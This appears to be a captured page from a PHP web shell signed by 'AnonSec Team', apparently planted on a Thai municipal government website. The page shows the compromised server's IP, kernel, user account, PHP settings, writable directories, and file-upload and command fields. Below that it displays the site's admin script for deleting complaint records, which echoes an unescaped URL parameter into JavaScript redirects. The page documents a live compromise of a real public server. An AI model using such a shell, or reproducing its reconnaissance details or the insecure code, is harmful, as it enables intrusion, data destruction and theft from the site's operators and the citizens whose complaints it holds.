NG1NDEX
Server IP : 103.233.192.212  /  Your IP : 18.222.231.86
Web Server : Apache/2
System : Linux sv1.inde.co.th 3.10.0-1160.36.2.el7.x86_64 #1 SMP Wed Jul 21 11:57:15 UTC 2021 x86_64
User : sumpatuan ( 1058)
PHP Version : 5.5.38
Disable Function : symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,putenv,passthru,escapeshellarg,escapeshellcmd,pcntl_exec,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,ini_restore
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/sumpatuan/domains/sumpatuan.go.th/private_html/admin/data/action/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/sumpatuan/domains/sumpatuan.go.th/private_html/admin/data/action/del-complain.php
<?php
require_once('session_backend_administrator.php');
header('Content-Type: text/html; charset=UTF-8');
date_default_timezone_set("Asia/Bangkok"); 

if($STT_login=="admin_login_true"){

    if(isset($_GET['id']) && isset($_GET['type']) && isset($_GET['link']) ) {

            $del_id = $con_db_administrator->real_escape_string($_GET['id']);
            $del_type = $con_db_administrator->real_escape_string($_GET['type']);
            $link = $con_db_administrator->real_escape_string($_GET['link']);

            $sql_cdata = " SELECT COUNT(*) FROM `data_filedoc_complain` WHERE `id_tbdata_filedoc_complain`='$del_id' AND `typedata_filedoc_complain`='$del_type' ";
            $qr_cdata = mysqli_query($con_db_administrator, $sql_cdata) or trigger_error("SQL", E_USER_ERROR);
            $rs_cdata = mysqli_fetch_row($qr_cdata);
            $cdel_file = $rs_cdata[0];

            if($cdel_file==0){
                    $sql_del = " DELETE FROM `data_complain` WHERE `id_complain`='$del_id' ";  
                    $qr_del = $con_db_administrator->query($sql_del);
                    if(!$qr_del){ 	
                        echo "<SCRIPT type='text/javascript'>
                                alert(' เกิดข้อผิดพลาด! ไม่สามารถลบข้อมูลได้ [1]');
                                window.location.replace('../$link');
                            </SCRIPT>";
                        exit;
                    }else{	
                        echo "<SCRIPT type='text/javascript'>
                                alert('ลบข้อมูล สำเร็จ');
                                window.location.replace('../$link');
                            </SCRIPT>";
                        exit;
                    }
            }else{
                $sql_del = " DELETE FROM `data_complain` WHERE `id_complain`='$del_id' ";  
                $qr_del = $con_db_administrator->query($sql_del);
                if(!$qr_del){ 	
                    echo "<SCRIPT type='text/javascript'>
                            alert(' เกิดข้อผิดพลาด! ไม่สามารถลบข้อมูลได้ [2]');
                            window.location.replace('../$link');
                        </SCRIPT>";
                    exit;
                }else{	
                    $sql_delfile = " SELECT `path_filedoc_complain` FROM `data_filedoc_complain` WHERE `id_tbdata_filedoc_complain`='$del_id' AND `typedata_filedoc_complain`='$del_type' ";
                    $qr_delfile = mysqli_query($con_db_administrator,$sql_delfile) or die( mysqli_error($con_db_administrator));
                    while($rs_delfile = mysqli_fetch_array($qr_delfile)){
                        $delfile = $rs_delfile['path_filedoc_complain'];
                        $del_pathfile = '../../../'.$delfile;
                        @unlink($del_pathfile);
                    }
    
                    $sql_delsqlfile = " DELETE FROM `data_filedoc_complain` WHERE `id_tbdata_filedoc_complain`='$del_id' AND `typedata_filedoc_complain`='$del_type' ";  
                    $qr_delsqlfile = $con_db_administrator->query($sql_delsqlfile);
                    if(!$qr_delsqlfile){ 	
                        echo "<SCRIPT type='text/javascript'>
                                alert(' เกิดข้อผิดพลาด! ไม่สามารถลบข้อมูลได้ [3]');
                                window.location.replace('../$link');
                            </SCRIPT>";
                        exit;
                    }else{	
                        echo "<SCRIPT type='text/javascript'>
                                alert('ลบข้อมูล สำเร็จ');
                                window.location.replace('../$link');
                            </SCRIPT>";
                        exit;
                    }
                }


            }


    }else{
        echo "<SCRIPT type='text/javascript'>
            alert('เกิดข้อผิดพลาด! ไม่พบข้อมูลที่ต้องการลบ');
            window.location.replace(document.referrer);
        </SCRIPT>";
        exit;
    }

}else{
    echo "<SCRIPT type='text/javascript'>
        alert('กรุณาเข้าสู่ระบบ');
        window.location.replace('../../index');
    </SCRIPT>";
    exit;
}
mysqli_close($con_db_administrator);
?>

Anon7 - 2022
AnonSec Team